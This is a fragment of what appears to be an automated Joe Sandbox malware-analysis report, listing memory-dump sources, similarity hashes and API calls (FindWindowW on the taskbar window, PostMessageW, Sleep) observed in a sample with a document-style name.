                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DirectoryFreeLibrarySystem
                                                        • String ID: WIN_XPe
                                                        • API String ID: 510247158-3257408948
                                                        • Opcode ID: 45c5fa36511d4d77d8fcf57a34938974e731aeeac5ab67ff51916ef0dbb05cc8
                                                        • Instruction ID: c2f946faceb7c3a07c1a65804b81eb05b3c13b13f99c7435c88e870abcb8e8e0
                                                        • Opcode Fuzzy Hash: 45c5fa36511d4d77d8fcf57a34938974e731aeeac5ab67ff51916ef0dbb05cc8
                                                        • Instruction Fuzzy Hash: CAE0C970C4410DEFCB19EBA8D845AECB7B8BB08300F14C496E422B2151C7795A46DF26
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007784DF
                                                        • PostMessageW.USER32(00000000), ref: 007784E6
                                                          • Part of subcall function 00758355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007583CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: f99c24c4549afc90c6119f21e18c43fa938749bc1194fb46a26d98b2b2ec4ab8
                                                        • Instruction ID: 10a2d608d265cabef77f6378f205746ab9ec9a52fd361982d932984a2401d399
                                                        • Opcode Fuzzy Hash: f99c24c4549afc90c6119f21e18c43fa938749bc1194fb46a26d98b2b2ec4ab8
                                                        • Instruction Fuzzy Hash: F7D0A972380300BBE670A3709C0FFCA6A04AB18B01F00492A7309AA2C0C8E8B8008228
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0077849F
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007784B2
                                                          • Part of subcall function 00758355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007583CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: ce246f41f97cbbd95a6b1bde41485afb9ab6ec8365aa29f54dcab38ef6b32026
                                                        • Instruction ID: 5168c54115fba64871bcdf35deb8752c5ab275b20035aafcaa7b0bd6094bd9b0
                                                        • Opcode Fuzzy Hash: ce246f41f97cbbd95a6b1bde41485afb9ab6ec8365aa29f54dcab38ef6b32026
                                                        • Instruction Fuzzy Hash: E5D0A972384300B7E670A3709C0FFCA6A04AB14B01F00492A7309AA2C0C8E8A8008224